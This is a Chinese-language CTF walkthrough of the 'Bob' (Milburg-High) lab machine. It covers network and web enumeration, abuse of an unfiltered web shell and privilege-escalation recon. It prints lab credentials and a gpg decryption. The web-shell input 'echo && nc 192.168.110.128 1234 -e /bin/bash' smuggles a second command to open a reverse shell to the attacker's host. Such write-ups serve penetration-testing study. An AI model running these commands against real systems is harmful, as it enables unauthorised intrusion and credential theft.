目录

信息收集

1、netdiscover

2、nmap

3、nikto

4、whatweb

目录探测

1、dirb

2、gobuster

3、dirsearch

WEB

主页：

robots.txt

其他页面

反弹shell

提权

系统信息收集

jc账户

本地提权

信息收集

1、netdiscover

┌──(root㉿ru)-[~/kali]
└─# netdiscover -r 192.168.110.0/24

 Currently scanning: 192.168.110.0/24   |   Screen View: Unique Hosts

 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.110.1   00:50:56:c0:00:08      1      60  VMware, Inc.
 192.168.110.2   00:50:56:ec:d1:ca      1      60  VMware, Inc.
 192.168.110.138 00:50:56:22:4d:bb      1      60  VMware, Inc.
 192.168.110.254 00:50:56:eb:0a:02      1      60  VMware, Inc.

---

2、nmap

端口探测

┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.110.138 --min-rate 10000 -oA port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-18 18:53 CST
Nmap scan report for 192.168.110.138
Host is up (0.0047s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
25468/tcp open  unknown
MAC Address: 00:50:56:22:4D:BB (VMware)

Nmap done: 1 IP address (1 host up) scanned in 7.53 seconds

┌──(root㉿ru)-[~/kali]
└─# cat port.nmap | head -n 8 | tail -n 3 | awk '{print $1}' | awk -F "/" '{print $1}' | xargs -n 3 | sed 's/ /,/g'
21,80,25468

---

版本信息收集

┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -O -A -p 21,80,25468 192.168.110.138 --min-rat 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-18 18:55 CST
Nmap scan report for 192.168.110.138
Host is up (0.00047s latency).

PORT      STATE SERVICE VERSION
21/tcp    open  ftp     ProFTPD 1.3.5b
80/tcp    open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 4 disallowed entries
| /login.php /dev_shell.php /lat_memo.html
|_/passwords.html
|_http-server-header: Apache/2.4.25 (Debian)
25468/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
|   2048 84:f2:f8:e5:ed:3e:14:f3:93:d4:1e:4c:41:3b:a2:a9 (RSA)
|   256 5b:98:c7:4f:84:6e:fd:56:6a:35:16:83:aa:9c:ea:f8 (ECDSA)
|_  256 39:16:56:fb:4e:0f:50:85:40:d3:53:22:41:43:38:15 (ED25519)
MAC Address: 00:50:56:22:4D:BB (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.47 ms 192.168.110.138

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.60 seconds

---

3、nikto

┌──(root㉿ru)-[~/kali]
└─# nikto -h 192.168.110.138
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.110.138
+ Target Hostname:    192.168.110.138
+ Target Port:        80
+ Start Time:         2024-01-18 18:56:07 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /robots.txt: Entry '/passwords.html' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/dev_shell.php' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/lat_memo.html' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 591, size: 5669af30ee8f1, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: POST, OPTIONS, HEAD, GET .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /login.html: Admin login page/section found.
+ 8106 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2024-01-18 18:56:26 (GMT8) (19 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

---

4、whatweb

┌──(root㉿ru)-[~/kali]
└─# whatweb -v http://192.168.110.138
WhatWeb report for http://192.168.110.138
Status    : 200 OK
Title     : <None>
IP        : 192.168.110.138
Country   : RESERVED, ZZ

Summary   : Apache[2.4.25], HTTPServer[Debian Linux][Apache/2.4.25 (Debian)]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and
        maintain an open-source HTTP server for modern operating
        systems including UNIX and Windows NT. The goal of this
        project is to provide a secure, efficient and extensible
        server that provides HTTP services in sync with the current
        HTTP standards.

        Version      : 2.4.25 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        OS           : Debian Linux
        String       : Apache/2.4.25 (Debian) (from server string)

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Thu, 18 Jan 2024 10:56:19 GMT
        Server: Apache/2.4.25 (Debian)
        Last-Modified: Sun, 04 Mar 2018 19:09:32 GMT
        ETag: "591-5669af30ee8f1-gzip"
        Accept-Ranges: bytes
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 531
        Connection: close
        Content-Type: text/html

---

目录探测

1、dirb

┌──(root㉿ru)-[~/kali]
└─# dirb http://192.168.110.138

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Jan 18 18:57:40 2024
URL_BASE: http://192.168.110.138/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.110.138/ ----
+ http://192.168.110.138/index.html (CODE:200|SIZE:1425)
+ http://192.168.110.138/robots.txt (CODE:200|SIZE:111)
+ http://192.168.110.138/server-status (CODE:403|SIZE:303)

-----------------
END_TIME: Thu Jan 18 18:57:45 2024
DOWNLOADED: 4612 - FOUND: 3

---

2、gobuster

┌──(root㉿ru)-[~/kali]
└─# gobuster dir -u http://192.168.110.138 -x php,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.110.138
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,php,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 295]
/.php                 (Status: 403) [Size: 294]
/index.html           (Status: 200) [Size: 1425]
/news.html            (Status: 200) [Size: 4086]
/contact.html         (Status: 200) [Size: 3145]
/about.html           (Status: 200) [Size: 2579]
/login.html           (Status: 200) [Size: 1560]
/robots.txt           (Status: 200) [Size: 111]
/passwords.html       (Status: 200) [Size: 673]
/.php                 (Status: 403) [Size: 294]
/.html                (Status: 403) [Size: 295]
/server-status        (Status: 403) [Size: 303]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished

---

3、dirsearch

┌──(root㉿ru)-[~/kali]
└─# dirsearch -u http://192.168.110.138 -e* -x 404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594

Output File: /root/kali/reports/http_192.168.110.138/_24-01-18_18-58-16.txt

Target: http://192.168.110.138/

[18:58:16] Starting:
[18:58:29] 200 -    1KB - /about.html
[18:59:09] 200 -  921B  - /contact.html
[18:59:38] 200 -  621B  - /login.html
[18:59:49] 200 -    1KB - /news.html
[18:59:53] 200 -  406B  - /passwords.html
[19:00:10] 200 -   93B  - /robots.txt

Task Completed

---

WEB

主页：

---

---

robots.txt

---

其他页面

---

---

翻译：

备忘录由用户Bob在GMT+10:00:37:42发送
嘿，伙计们，这里的IT别忘了查看您关于最近安全漏洞的电子邮件。
服务器上运行着一个没有保护的web shell，但它应该是安全的，因为我已经将过滤器从旧的windows服务器移植到了我们的新linux服务器。您的电子邮件将具有指向外壳的链接。
-Bob

---

---

翻译：

真的，是谁制作了这个文件，至少可以显示你的密码哈希，黑客不能用哈希做任何事情，
这可能就是我们最初发生安全漏洞的原因。科米恩人这是基本的101安全！我已将文件从服务器上移走。
不要每次有人做这样愚蠢的事情时都让我收拾残局。我们将举行一次会议，讨论我在服务器上发现的这件事和其他事情。>：(

---

反弹shell

echo && nc 192.168.110.128 1234 -e /bin/bash

---

---

---

python3 -c 'import pty;pty.spawn("/bin/bash")'


使用py获得完善的交互式shell

---

提权

系统信息收集

www-data@Milburg-High:/home$ cat /etc/passwd | grep "/home" | grep -v nologin
cat /etc/passwd | grep "/home" | grep -v nologin
c0rruptedb1t:x:1000:1000:c0rruptedb1t,,,:/home/c0rruptedb1t:/bin/bash
bob:x:1001:1001:Bob,,,,Not the smartest person:/home/bob:/bin/bash
jc:x:1002:1002:James C,,,:/home/jc:/bin/bash
seb:x:1003:1003:Sebastian W,,,:/home/seb:/bin/bash
elliot:x:1004:1004:Elliot A,,,:/home/elliot:/bin/bash

---

www-data@Milburg-High:/home$ ls -al /etc/passwd /etc/shadow
ls -al /etc/passwd /etc/shadow
-rw-r--r-- 1 root root   2327 Mar  4  2018 /etc/passwd
-rw-r----- 1 root shadow 1783 Mar  8  2018 /etc/shadow

---

www-data@Milburg-High:/home$ uname -a
uname -a
Linux Milburg-High 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64 GNU/Linux

www-data@Milburg-High:/home$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Debian
Description:    Debian GNU/Linux 9.3 (stretch)
Release:        9.3
Codename:       stretch

---

www-data@Milburg-High:/home$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/xorg/Xorg.wrap
/usr/lib/openssh/ssh-keysign
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/chsh
/bin/su
/bin/ping
/bin/umount
/bin/mount
/bin/ntfs-3g
/bin/fusermount

---

www-data@Milburg-High:/home$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
www-data@Milburg-High:/home$

---

www-data@Milburg-High:/home$ cd bob
cd bob
www-data@Milburg-High:/home/bob$ ls -al
ls -al
total 172
drwxr-xr-x 18 bob  bob   4096 Mar  8  2018 .
drwxr-xr-x  6 root root  4096 Mar  4  2018 ..
-rw-------  1 bob  bob   1980 Mar  8  2018 .ICEauthority
-rw-------  1 bob  bob    214 Mar  8  2018 .Xauthority
-rw-------  1 bob  bob   6403 Mar  8  2018 .bash_history
-rw-r--r--  1 bob  bob    220 Feb 21  2018 .bash_logout
-rw-r--r--  1 bob  bob   3548 Mar  5  2018 .bashrc
drwxr-xr-x  7 bob  bob   4096 Feb 21  2018 .cache
drwx------  8 bob  bob   4096 Feb 27  2018 .config
-rw-r--r--  1 bob  bob     55 Feb 21  2018 .dmrc
drwxr-xr-x  2 bob  bob   4096 Feb 21  2018 .ftp
drwx------  3 bob  bob   4096 Mar  5  2018 .gnupg
drwxr-xr-x  3 bob  bob   4096 Feb 21  2018 .local
drwx------  4 bob  bob   4096 Feb 21  2018 .mozilla
drwxr-xr-x  2 bob  bob   4096 Mar  4  2018 .nano
-rw-r--r--  1 bob  bob     72 Mar  5  2018 .old_passwordfile.html
-rw-r--r--  1 bob  bob    675 Feb 21  2018 .profile
drwx------  2 bob  bob   4096 Mar  5  2018 .vnc
-rw-r--r--  1 bob  bob  25211 Mar  8  2018 .xfce4-session.verbose-log
-rw-r--r--  1 bob  bob  27563 Mar  7  2018 .xfce4-session.verbose-log.last
-rw-------  1 bob  bob   3672 Mar  8  2018 .xsession-errors
-rw-------  1 bob  bob   2866 Mar  7  2018 .xsession-errors.old
drwxr-xr-x  2 bob  bob   4096 Feb 21  2018 Desktop
drwxr-xr-x  3 bob  bob   4096 Mar  5  2018 Documents
drwxr-xr-x  3 bob  bob   4096 Mar  8  2018 Downloads
drwxr-xr-x  2 bob  bob   4096 Feb 21  2018 Music
drwxr-xr-x  2 bob  bob   4096 Feb 21  2018 Pictures
drwxr-xr-x  2 bob  bob   4096 Feb 21  2018 Public
drwxr-xr-x  2 bob  bob   4096 Feb 21  2018 Templates
drwxr-xr-x  2 bob  bob   4096 Feb 21  2018 Videos

---

---

在bob目录下找到账号密码！

jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3

---

jc账户

jc@Milburg-High:/home/bob$ sudo -l
sudo -l
Matching Defaults entries for jc on Milburg-High:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jc may run the following commands on Milburg-High:
    (ALL) NOPASSWD: /usr/bin/service apache2 *
    (root) NOPASSWD: /bin/systemctl start ssh

---

---

在bob用户的Documents目录下找到重要线索！

---

---

/home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here目录下找到一个sh脚本！

每句话的开头组成单词：HARPOCRATES 

---

---

使用gpg进行解密！密码就是HARPOCRATES 

gpg --batch --passphrase HARPOCRATES -d login.txt.gpg

---

---

成功！ bob密码：b0bcat_

---

---

本地提权

---

---

---